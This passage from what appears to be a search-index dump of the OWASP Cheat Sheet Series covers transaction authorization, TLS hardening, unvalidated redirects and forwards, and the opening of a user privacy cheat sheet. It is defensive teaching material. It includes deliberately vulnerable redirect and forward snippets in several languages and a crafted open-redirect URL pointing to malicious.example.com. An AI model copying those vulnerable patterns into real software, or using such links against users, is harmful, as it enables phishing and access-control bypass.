In the abovementioned scenario, the same method was used to authenticate the user and to authorize the transaction. Malware can abuse this behavior to extract transaction authorization credentials without the user's knowledge. Social engineering methods can be used regardless of the authentication and operation authorization methods utilized, but the application shouldn't make such attack scenarios any easier.

Safeguards should allow the user to easily distinguish authentication from transaction authorization. This could be achieved by:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#15-each-transaction-should-be-authorized-using-unique-authorization-credentials","title":"1.5 Each transaction should be authorized using unique authorization credentials","text":"

Some applications ask for transaction authorization credentials only once, e.g. a static password, a code sent through SMS, or a token response. Afterwards, the user is able to authorize any transaction during the whole session, or at least has to reuse the same credentials each time a transaction needs to be authorized. Such behavior is not sufficient to prevent malware attacks, because malware can sniff such credentials and use them to authorize any transaction without the user's knowledge.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#2-non-functional-guidelines","title":"2. Non-functional guidelines","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#21-authorization-should-be-performed-and-enforced-server-side","title":"2.1 Authorization should be performed and enforced server-side","text":"

As with all other security controls, transaction authorization should be enforced server-side. It should by no means be possible to influence the authorization result by altering the data which flows from the client to the server, e.g. by:

To achieve this, security programming best practices should be applied, such as:

To avoid tampering, additional safeguards should be considered, for example cryptographically protecting the data for confidentiality and integrity, and then decrypting and verifying the data server-side.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#22-authorization-method-should-be-enforced-server-side","title":"2.2 Authorization method should be enforced server side","text":"

When multiple transaction authorization methods are available to the user, the server should enforce the use of the current authorization method chosen by the user in the application settings or enforced by application policies. It should be impossible to change the authorization method by manipulating the parameters provided by the client. Otherwise, malware can downgrade the authorization method to a less secure or even the least secure authorization method.

This is especially important when an application is developed to add a new, more secure authorization method. It is not very rare that a new authorization method is built on top of an old codebase. As a result, when a client sends parameters using the old method, the transaction may be authorized, despite the fact that the user has already switched to the new method.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#23-transaction-verification-data-should-be-generated-server-side","title":"2.3 Transaction verification data should be generated server-side","text":"

When significant transaction data is transmitted programmatically to an authorization component, extra care should be taken to prevent the client from modifying the transaction data at authorization time. Significant transaction data that has to be verified by the user should be generated and stored on the server, then passed to the authorization component without any possibility of tampering by the client.

A common anti-pattern is to collect significant transaction data client-side and pass it to the server. In such cases, malware can manipulate the data and, as a result, show faked transaction data in the authorization component.
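
A minimal sketch of the recommended pattern, with purely illustrative names: the server stores the pending transaction under an opaque identifier, and the authorization component only ever receives the server-held copy.

import secrets

PENDING_TRANSACTIONS = {}  # server-side store; a database in a real system

def create_transaction(user_id, target_account, amount):
    tx_id = secrets.token_urlsafe(16)
    PENDING_TRANSACTIONS[tx_id] = {
        "user": user_id,
        "target_account": target_account,
        "amount": amount,
    }
    return tx_id  # only this opaque id is sent back to the client

def data_for_authorization_component(tx_id):
    # Always read the server-held copy; never trust values re-sent by the client.
    return PENDING_TRANSACTIONS[tx_id]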

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#24-application-should-prevent-authorization-credentials-brute-forcing","title":"2.4 Application should prevent authorization credentials brute-forcing","text":"

When transaction authorization credentials are sent to the server for verification, the application has to prevent brute-forcing. The transaction authorization process must be restarted after a number of failed authorization attempts. In addition, other anti-brute-forcing and anti-automation techniques should be considered to prevent an attacker from automating his attacks; see the OWASP Authentication Cheat Sheet.
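
A minimal sketch of such a restart mechanism, assuming dict-like server-side session state and an illustrative attempt limit:

import secrets

MAX_ATTEMPTS = 3

def verify_authorization(session, submitted_code, expected_code):
    if secrets.compare_digest(submitted_code, expected_code):
        session["auth_attempts"] = 0
        return True
    session["auth_attempts"] = session.get("auth_attempts", 0) + 1
    if session["auth_attempts"] >= MAX_ATTEMPTS:
        # Too many failures: drop the pending transaction so the whole
        # authorization process has to be restarted from the beginning.
        session.pop("pending_tx", None)
        session["auth_attempts"] = 0
    return False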

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#25-application-should-control-which-transaction-state-transitions-are-allowed","title":"2.5 Application should control which transaction state transitions are allowed","text":"

Transaction authorization is usually performed in multiple steps, e.g.:

  1. The user enters the transaction data.
  2. The user requests authorization.
  3. The application initializes an authorization mechanism.
  4. The user verifies/confirms the transaction data.
  5. The user responds with the authorization credentials.
  6. The application validates authorization and executes a transaction.

An application should process such a business logic flow in sequential step order, preventing a user from performing these steps out of order or even skipping any of them (see OWASP ASVS requirement 15.1).
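
A minimal sketch of enforcing that step order server-side; the state names map to the numbered steps above and are illustrative only:

ALLOWED_TRANSITIONS = {
    "ENTERED": "AUTHORIZATION_REQUESTED",
    "AUTHORIZATION_REQUESTED": "CHALLENGE_SENT",
    "CHALLENGE_SENT": "AUTHORIZED",
    "AUTHORIZED": "EXECUTED",
}

def advance(transaction, next_state):
    # Reject any skipped or out-of-order step.
    if ALLOWED_TRANSITIONS.get(transaction["state"]) != next_state:
        raise ValueError("illegal transaction state transition")
    transaction["state"] = next_state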

This should protect against attack techniques such as:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#26-transaction-data-should-be-protected-against-modification","title":"2.6 Transaction data should be protected against modification","text":"

The transaction authorization process should protect against attack scenarios that modify transaction data after the initial entry by the user. For example, a bad implementation of a transaction authorization process may allow the following attacks (for reference, see steps of transaction authorization described in paragraph 2.5):

The protection against modification could be implemented using various techniques depending on the framework used, but one or more of the following should be present:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#27-confidentiality-of-the-transaction-data-should-be-protected-during-any-client-server-communications","title":"2.7 Confidentiality of the transaction data should be protected during any client / server communications","text":"

The transaction authorization process should protect the privacy of the transaction data being presented to the user to authorize, i.e. at steps 2 and 4 in paragraph 2.5.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#28-when-a-transaction-is-executed-the-system-should-check-whether-it-was-authorized","title":"2.8 When a transaction is executed, the system should check whether it was authorized","text":"

The result of the transaction entry and the authorization process described in paragraph 2.5 is the transaction execution. Just before the transaction is executed, there should be a final control gate which verifies whether the transaction was properly authorized by the user. Such a control, tied to execution, should prevent attacks such as:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#29-authorization-credentials-should-be-valid-only-by-limited-period-of-time","title":"2.9 Authorization credentials should be valid only by limited period of time","text":"

In some malware attack scenarios, the authorization credentials entered by the user are passed to a malware command and control (C&C) server and then used from an attacker-controlled machine. Such a process is often performed manually by an attacker. To make such attacks more difficult, the server should allow the transaction to be authorized only within a limited time window between the generation of the challenge or OTP and the transaction authorization. Additionally, such a safeguard will also aid in preventing resource exhaustion attacks. The time window should be carefully selected so as not to disrupt normal users' behavior.
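
A minimal sketch of such a time window check, with an illustrative window length:

import time

AUTHORIZATION_WINDOW_SECONDS = 120  # illustrative value; tune to your users' behavior

def is_within_window(challenge_created_at, now=None):
    # challenge_created_at is the server-side timestamp recorded when the
    # challenge or OTP was generated.
    now = time.time() if now is None else now
    return (now - challenge_created_at) <= AUTHORIZATION_WINDOW_SECONDS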

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#210-authorization-credentials-should-be-unique-for-every-operation","title":"2.10 Authorization credentials should be unique for every operation","text":"

To prevent all sorts of replay attacks, authorization credentials should be unique for every operation. This can be achieved using different methods depending on the applied transaction authorization mechanism, for example: using a timestamp, a sequence number or a random value in the signed transaction data or as part of the challenge.
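
One possible way to achieve this, shown as a hedged sketch rather than a prescribed design, is to bind the credential to the transaction data plus a fresh random nonce using an HMAC; key management and encoding details are omitted:

import hashlib
import hmac
import os

def signed_transaction_payload(key: bytes, target_account: str, amount: str):
    nonce = os.urandom(16)  # fresh per operation, so old signatures cannot be replayed
    message = nonce + f"{target_account}|{amount}".encode()
    signature = hmac.new(key, message, hashlib.sha256).digest()
    return nonce, signature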

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#remarks","title":"Remarks","text":"

We have identified other issues that should be taken into consideration while implementing transaction authorization; however, we deem them to be beyond the scope of this cheat sheet:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#references-and-future-reading","title":"References and future reading","text":"

References and future reading:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html","title":"Transport Layer Protection Cheat Sheet","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance on how to implement transport layer protection for an application using Transport Layer Security (TLS). When correctly implemented, TLS can provide a number of security benefits:

TLS is used by many other protocols to provide encryption and integrity, and can be used in a number of different ways. This cheatsheet is primarily focused on how to use TLS to protect clients connecting to a web application over HTTPS; although much of the guidance is also applicable to other uses of TLS.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#ssl-vs-tls","title":"SSL vs TLS","text":"

Secure Sockets Layer (SSL) was the original protocol that was used to provide encryption for HTTP traffic, in the form of HTTPS. There were two publicly released versions of SSL - versions 2 and 3. Both of these have serious cryptographic weaknesses and should no longer be used.

For various reasons the next version of the protocol (effectively SSL 3.1) was named Transport Layer Security (TLS) version 1.0. Subsequently TLS versions 1.1, 1.2 and 1.3 have been released.

The terms \"SSL\", \"SSL/TLS\" and \"TLS\" are frequently used interchangeably, and in many cases \"SSL\" is used when referring to the more modern TLS protocol. This cheatsheet will use the term \"TLS\" except where referring to the legacy protocols.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#server-configuration","title":"Server Configuration","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#only-support-strong-protocols","title":"Only Support Strong Protocols","text":"

The SSL protocols have a large number of weaknesses, and should not be used in any circumstances. General purpose web applications should default to TLS 1.3 (supporting TLS 1.2 if necessary), with all other protocols disabled. Where it is known that a web server must support legacy clients with unsupported and insecure browsers (such as Internet Explorer 10), it may be necessary to enable TLS 1.0 to provide support.
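
For a Python-based service, a minimal sketch of restricting the supported protocol versions with the standard-library ssl module looks like this (certificate and key paths are placeholders):

import ssl

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.minimum_version = ssl.TLSVersion.TLSv1_2  # rejects SSLv3, TLS 1.0 and TLS 1.1
context.maximum_version = ssl.TLSVersion.TLSv1_3
context.load_cert_chain("server.crt", "server.key")  # placeholder paths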

Where legacy protocols are required, the \"TLS_FALLBACK_SCSV\" extension should be enabled in order to prevent downgrade attacks against clients.

Note that PCI DSS forbids the use of legacy protocols such as TLS 1.0.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#only-support-strong-ciphers","title":"Only Support Strong Ciphers","text":"

There are a large number of different ciphers (or cipher suites) supported by TLS, which provide varying levels of security. Where possible, only GCM ciphers should be enabled. However, if it is necessary to support legacy clients, then other ciphers may be required.

At a minimum, the following types of ciphers should always be disabled:

See the TLS Cipher String Cheat Sheet for full details on securely configuring ciphers.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-diffie-hellman-parameters","title":"Use Strong Diffie-Hellman Parameters","text":"

Where ciphers that use the ephemeral Diffie-Hellman key exchange are in use (signified by the \"DHE\" or \"EDH\" strings in the cipher name), sufficiently secure Diffie-Hellman parameters (at least 2048 bits) should be used.

The following command can be used to generate 2048 bit parameters:

openssl dhparam -out dhparam2048.pem 2048\n

The Weak DH website provides guidance on how various web servers can be configured to use these generated parameters.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#disable-compression","title":"Disable Compression","text":"

TLS compression should be disabled in order to protect against a vulnerability (nicknamed CRIME) which could potentially allow sensitive information such as session cookies to be recovered by an attacker.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#patch-cryptographic-libraries","title":"Patch Cryptographic Libraries","text":"

As well as the vulnerabilities in the SSL and TLS protocols, there have also been a large number of historic vulnerabilities in SSL and TLS libraries, with Heartbleed being the most well known. As such, it is important to ensure that these libraries are kept up to date with the latest security patches.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#test-the-server-configuration","title":"Test the Server Configuration","text":"

Once the server has been hardened, the configuration should be tested. The OWASP Testing Guide chapter on SSL/TLS Testing contains further information on testing.

There are a number of online tools that can be used to quickly validate the configuration of a server, including:

Additionally, there are a number of offline tools that can be used:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#certificates","title":"Certificates","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-keys-and-protect-them","title":"Use Strong Keys and Protect Them","text":"

The private key used to generate the cipher key must be sufficiently strong for the anticipated lifetime of the private key and corresponding certificate. The current best practice is to select a key size of at least 2048 bits. Additional information on key lifetimes and comparable key strengths can be found here and in NIST SP 800-57.

The private key should also be protected from unauthorized access using filesystem permissions and other technical and administrative controls.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-cryptographic-hashing-algorithms","title":"Use Strong Cryptographic Hashing Algorithms","text":"

Certificates should use SHA-256 for the hashing algorithm, rather than the older MD5 and SHA-1 algorithms. These have a number of cryptographic weaknesses, and are not trusted by modern browsers.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-correct-domain-names","title":"Use Correct Domain Names","text":"

The domain name (or subject) of the certificate must match the fully qualified name of the server that presents the certificate. Historically this was stored in the commonName (CN) attribute of the certificate. However, modern versions of Chrome ignore the CN attribute, and require that the FQDN is in the subjectAlternativeName (SAN) attribute. For compatibility reasons, certificates should have the primary FQDN in the CN, and the full list of FQDNs in the SAN.

Additionally, when creating the certificate, the following should be taken into account:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#carefully-consider-the-use-of-wildcard-certificates","title":"Carefully Consider the use of Wildcard Certificates","text":"

Wildcard certificates can be convenient, however they violate the principle of least privilege, as a single certificate is valid for all subdomains of a domain (such as *.example.org). Where multiple systems are sharing a wildcard certificate, the likelihood that the private key for the certificate is compromised increases, as the key may be present on multiple systems. Additionally, the value of this key is significantly increased, making it a more attractive target for attackers.

The issues around the use of wildcard certificates are complicated, and there are various other discussions of them online.

When risk assessing the use of wildcard certificates, the following areas should be considered:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-an-appropriate-certification-authority-for-the-applications-user-base","title":"Use an Appropriate Certification Authority for the Application's User Base","text":"

In order to be trusted by users, certificates must be signed by a trusted certificate authority (CA). For Internet facing applications, this should be one of the CAs which are well-known and automatically trusted by operating systems and browsers.

The LetsEncrypt CA provides free domain validated SSL certificates, which are trusted by all major browsers. As such, consider whether there are any benefits to purchasing a certificate from a commercial CA.

For internal applications, an internal CA can be used. This means that the FQDN of the certificate will not be exposed (either to an external CA, or publicly in certificate transparency lists). However, the certificate will only be trusted by users who have imported and trusted the internal CA certificate that was used to sign them.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-caa-records-to-restrict-which-cas-can-issue-certificates","title":"Use CAA Records to Restrict Which CAs can Issue Certificates","text":"

Certification Authority Authorization (CAA) DNS records can be used to define which CAs are permitted to issue certificates for a domain. The record contains a list of CAs, and any CA that is not included in that list should refuse to issue a certificate for the domain. This can help to prevent an attacker from obtaining unauthorized certificates for a domain through a less-reputable CA. Where it is applied to all subdomains, it can also be useful from an administrative perspective by limiting which CAs administrators or developers are able to use, and by preventing them from obtaining unauthorized wildcard certificates.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#always-provide-all-needed-certificates","title":"Always Provide All Needed Certificates","text":"

In order to validate the authenticity of a certificate, the user's browser must examine the certificate that was used to sign it and compare it to the list of CAs trusted by their system. In many cases the certificate is not directly signed by a root CA, but is instead signed by an intermediate CA, which is in turn signed by the root CA.

If the user does not know or trust this intermediate CA then the certificate validation will fail, even if the user trusts the ultimate root CA, as they cannot establish a chain of trust between the certificate and the root. In order to avoid this, any intermediate certificates should be provided alongside the main certificate.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-the-use-of-extended-validation-certificates","title":"Consider the use of Extended Validation Certificates","text":"

Extended validation (EV) certificates claim to provide a higher level of verification of the entity, as they perform checks that the requestor is a legitimate legal entity, rather than just verifying the ownership of the domain name like normal (or \"Domain Validated\") certificates. This can effectively be viewed as the difference between \"This site is really run by Example Company Inc.\" vs \"This domain is really example.org\".

Historically these displayed differently in the browser, often showing the company name or a green icon or background in the address bar. However, as of 2019 both Chrome and Firefox have announced that they will be removing these indicators, as they do not believe that EV certificates provide any additional protection.

There is no security downside to the use of EV certificates. However, as they are significantly more expensive than domain validated certificates, an assessment should be made to determine whether they provide any additional value.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#application","title":"Application","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-tls-for-all-pages","title":"Use TLS For All Pages","text":"

TLS should be used for all pages, not just those that are considered sensitive such as the login page. If there are any pages that do not enforce the use of TLS, these could give an attacker an opportunity to sniff sensitive information such as session tokens, or to inject malicious JavaScript into the responses to carry out other attacks against the user.

For public facing applications, it may be appropriate to have the web server listening for unencrypted HTTP connections on port 80, and then immediately redirecting them with a permanent redirect (HTTP 301) in order to provide a better experience to users who manually type in the domain name. This should then be supported with the HTTP Strict Transport Security (HSTS) header to prevent them accessing the site over HTTP in the future.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#do-not-mix-tls-and-non-tls-content","title":"Do Not Mix TLS and Non-TLS Content","text":"

A page that is available over TLS should not include any resources (such as JavaScript or CSS files) that are loaded over unencrypted HTTP. These unencrypted resources could allow an attacker to sniff session cookies or inject malicious code into the page. Modern browsers will also block attempts to load active content over unencrypted HTTP into secure pages.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-the-secure-cookie-flag","title":"Use the \"Secure\" Cookie Flag","text":"

All cookies should be marked with the \"Secure\" attribute, which instructs the browser to only send them over encrypted HTTPS connections, in order to prevent them from being sniffed from an unencrypted HTTP connection. This is important even if the website does not listen on HTTP (port 80), as an attacker performing an active man in the middle attack could present a spoofed webserver on port 80 to the user in order to steal their cookie.
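
For example (a minimal sketch using the Java Servlet API; the cookie name, the sessionToken value and the response object are illustrative or assumed to be in scope), the attribute is set when the cookie is created:

import javax.servlet.http.Cookie;

// Minimal sketch: a cookie that will only ever be sent over HTTPS.
Cookie sessionCookie = new Cookie(\"SESSIONID\", sessionToken);
sessionCookie.setSecure(true);    // the \"Secure\" attribute - HTTPS only
sessionCookie.setHttpOnly(true);  // also keep it out of reach of JavaScript
response.addCookie(sessionCookie);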

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#prevent-caching-of-sensitive-data","title":"Prevent Caching of Sensitive Data","text":"

Although TLS provides protection of data while it is in transit, it does not provide any protection for data once it has reached the requesting system. As such, this information may be stored in the cache of the user's browser, or by any intercepting proxies which are configured to perform TLS decryption.

Where sensitive data is returned in responses, HTTP headers should be used to instruct the browser and any proxy servers not to cache the information, in order to prevent it being stored or returned to other users. This can be achieved by setting the following HTTP headers in the response:

Cache-Control: no-cache, no-store, must-revalidate\nPragma: no-cache\nExpires: 0\n
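
Where these headers are set from application code rather than server configuration, a minimal Java Servlet API sketch (assuming response is the HttpServletResponse in scope) is:

// Minimal sketch: instruct the browser and any intercepting proxies not to
// cache or store this response.
response.setHeader(\"Cache-Control\", \"no-cache, no-store, must-revalidate\");
response.setHeader(\"Pragma\", \"no-cache\");
response.setHeader(\"Expires\", \"0\");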
"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-http-strict-transport-security","title":"Use HTTP Strict Transport Security","text":"

HTTP Strict Transport Security (HSTS) instructs the user's browser to always request the site over HTTPS, and also prevents the user from bypassing certificate warnings. See the HTTP Strict Transport Security cheatsheet for further information on implementing HSTS.
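
As an illustrative sketch (the max-age value and the includeSubDomains directive should be chosen deliberately for your site), the header can be added to every response from a servlet or filter:

// Minimal sketch: ask browsers to use HTTPS only for this site for one year.
// Only include includeSubDomains if every subdomain is served over HTTPS.
response.setHeader(\"Strict-Transport-Security\", \"max-age=31536000; includeSubDomains\");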

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-the-use-of-client-side-certificates","title":"Consider the use of Client-Side Certificates","text":"

In a typical configuration, TLS is used with a certificate on the server so that the client is able to verify the identity of the server, and to provide an encrypted connection between them. However, there are two main weaknesses with this approach:

Client certificates address both of these issues by requiring that the client proves their identity to the server with their own certificate. This not only provides strong authentication of the identity of the client, but also prevents an intermediate party from performing TLS decryption, even if they have a trusted CA certificate on the client system.

Client certificates are rarely used on public systems due to a number of issues:

However, they should be considered for high-value applications or APIs, especially where there are a small number of technically sophisticated users, or where all users are part of the same organisation.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-using-public-key-pinning","title":"Consider Using Public Key Pinning","text":"

Public key pinning can be used to provide assurance that the server's certificate is not only valid and trusted, but also that it matches the certificate expected for the server. This provides protection against an attacker who is able to obtain a valid certificate, either by exploiting a weakness in the validation process, compromising a trusted certificate authority, or having administrative access to the client.

Public key pinning was added to browsers in the HTTP Public Key Pinning (HPKP) standard. However, due to a number of issues, it has subsequently been deprecated and is no longer recommended or supported by modern browsers.

However, public key pinning can still provide security benefits for mobile applications, thick clients and server-to-server communication. This is discussed in further detail in the Pinning Cheat Sheet.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html","title":"Unvalidated Redirects and Forwards Cheat Sheet","text":""},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application's access control check and then forward the attacker to privileged functions that they would normally not be able to access.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#safe-url-redirects","title":"Safe URL Redirects","text":"

When you want to redirect a user automatically to another page (without an action from the visitor, such as clicking on a hyperlink), you might implement code such as the following:

Java

response.sendRedirect(\"http://www.mysite.com\");\n

PHP

<?php\n/* Redirect browser */\nheader(\"Location: http://www.mysite.com\");\n/* Exit to prevent the rest of the code from executing */\nexit;\n?>\n

ASP .NET

Response.Redirect(\"~/folder/Login.aspx\")\n

Rails

redirect_to login_path\n

Rust actix web

  Ok(HttpResponse::Found()\n.insert_header((header::LOCATION, \"https://mysite.com/\"))\n.finish())\n

In the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirects","title":"Dangerous URL Redirects","text":"

The following examples demonstrate unsafe redirect and forward code.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirect-example-1","title":"Dangerous URL Redirect Example 1","text":"

The following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL:

response.sendRedirect(request.getParameter(\"url\"));\n

The following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL. Additionally, the PHP code after this header() function will continue to execute, so if the user configures their browser to ignore the redirect, they may be able to access the rest of the page.

$redirect_url = $_GET['url'];\nheader(\"Location: \" . $redirect_url);\n

A similar example of C# .NET Vulnerable Code:

string url = request.QueryString[\"url\"];\nResponse.Redirect(url);\n

And in Rails:

redirect_to params[:url]\n

Rust actix web

  Ok(HttpResponse::Found()\n.insert_header((header::LOCATION, query_string.path.as_str()))\n.finish())\n

The above code is vulnerable to an attack if no validation or extra method controls are applied to verify that the URL is a legitimate, expected destination. This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site.

If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example:

 http://example.com/example.php?url=http://malicious.example.com\n

The user sees a link directing to the original trusted site (example.com) and does not realize the redirection that could take place.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirect-example-2","title":"Dangerous URL Redirect Example 2","text":"

ASP.NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to upgrade to MVC 3.

The code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter.

ASP.NET MVC 2 LogOn action in AccountController.cs (see Microsoft Docs link provided above for the context):

[HttpPost]\npublic ActionResult LogOn(LogOnModel model, string returnUrl)\n{\nif (ModelState.IsValid)\n{\nif (MembershipService.ValidateUser(model.UserName, model.Password))\n{\nFormsService.SignIn(model.UserName, model.RememberMe);\nif (!String.IsNullOrEmpty(returnUrl))\n{\nreturn Redirect(returnUrl);\n}\nelse\n{\nreturn RedirectToAction(\"Index\", \"Home\");\n}\n}\nelse\n{\nModelState.AddModelError(\"\", \"The user name or password provided is incorrect.\");\n}\n}\n\n// If we got this far, something failed, redisplay form\nreturn View(model);\n}\n
"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-forward-example","title":"Dangerous Forward Example","text":"

When applications allow user input to forward requests between different parts of the site, the application must check that the user is authorized to access the URL, that they are permitted to perform the functions it provides, and that it is an appropriate URL request.

If the application fails to perform these checks, an attacker-crafted URL may pass the application's access control check and then forward the attacker to an administrative function that they would not normally be permitted to access.

Example:

http://www.example.com/function.jsp?fwd=admin.jsp\n

The following code is a Java servlet that will receive a GET request with a URL parameter named fwd in the request to forward to the address specified in the URL parameter. The servlet will retrieve the URL parameter value from the request and complete the server-side forward processing before responding to the browser.

public class ForwardServlet extends HttpServlet\n{\nprotected void doGet(HttpServletRequest request, HttpServletResponse response)\nthrows ServletException, IOException {\nString query = request.getQueryString();\nif (query.contains(\"fwd\"))\n{\nString fwd = request.getParameter(\"fwd\");\ntry\n{\nrequest.getRequestDispatcher(fwd).forward(request, response);\n}\ncatch (ServletException e)\n{\ne.printStackTrace();\n}\n}\n}\n}\n
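
A safer variant (a hedged sketch with an illustrative allow list of destinations) treats the fwd parameter as a key into a fixed map of permitted forward targets, so the client can never supply an arbitrary path:

import java.io.IOException;
import java.util.Map;
import javax.servlet.ServletException;
import javax.servlet.http.*;

// Minimal sketch: only forward to destinations that are explicitly allow-listed.
// The destination pages listed here are illustrative only; authorisation for
// the chosen destination should still be checked before forwarding.
public class SafeForwardServlet extends HttpServlet {

    private static final Map<String, String> ALLOWED_FORWARDS = Map.of(
            \"home\",    \"/home.jsp\",
            \"profile\", \"/profile.jsp\");

    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String key = request.getParameter(\"fwd\");
        String target = (key == null) ? null : ALLOWED_FORWARDS.get(key);
        if (target == null) {
            response.sendError(HttpServletResponse.SC_BAD_REQUEST);
            return;
        }
        request.getRequestDispatcher(target).forward(request, response);
    }
}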
"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#preventing-unvalidated-redirects-and-forwards","title":"Preventing Unvalidated Redirects and Forwards","text":"

Safe use of redirects and forwards can be done in a number of ways:

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#validating-urls","title":"Validating URLs","text":"

Validating and sanitising user input to determine whether a URL is safe is not a trivial task. Detailed instructions on how to implement URL validation are described in the Server Side Request Forgery Prevention Cheat Sheet.
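
One common complementary pattern (shown here as a hedged sketch with illustrative host names, assuming a recent JDK) is to only redirect to destinations whose host appears on an explicit allow list, and to fall back to a safe default page otherwise:

import java.net.URI;
import java.net.URISyntaxException;
import java.util.Set;

// Minimal sketch: only follow redirect targets whose scheme and host are
// explicitly allow-listed; anything else falls back to a safe default.
// The allowed hosts and the default landing page are illustrative.
public final class RedirectValidator {

    private static final Set<String> ALLOWED_HOSTS = Set.of(\"www.mysite.com\", \"intranet.mysite.com\");
    private static final String DEFAULT_TARGET = \"https://www.mysite.com/\";

    public static String safeTarget(String userSuppliedUrl) {
        if (userSuppliedUrl != null) {
            try {
                URI uri = new URI(userSuppliedUrl);
                if (\"https\".equals(uri.getScheme()) && ALLOWED_HOSTS.contains(uri.getHost())) {
                    return userSuppliedUrl;
                }
            } catch (URISyntaxException e) {
                // malformed input - fall through to the safe default
            }
        }
        return DEFAULT_TARGET;
    }
}

This could then be used as response.sendRedirect(RedirectValidator.safeTarget(request.getParameter(\"url\"))), so untrusted input never reaches the redirect directly.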

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html","title":"User Privacy Protection Cheat Sheet","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This OWASP Cheat Sheet introduces mitigation methods that web developers may utilize in order to protect their users from a vast array of potential threats and aggressions that might try to undermine their privacy and anonymity. This cheat sheet focuses on privacy and anonymity threats that users might face by using online services, especially in contexts such as social networking and communication platforms.

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#guidelines","title":"Guidelines","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#strong-cryptography","title":"Strong Cryptography","text":"

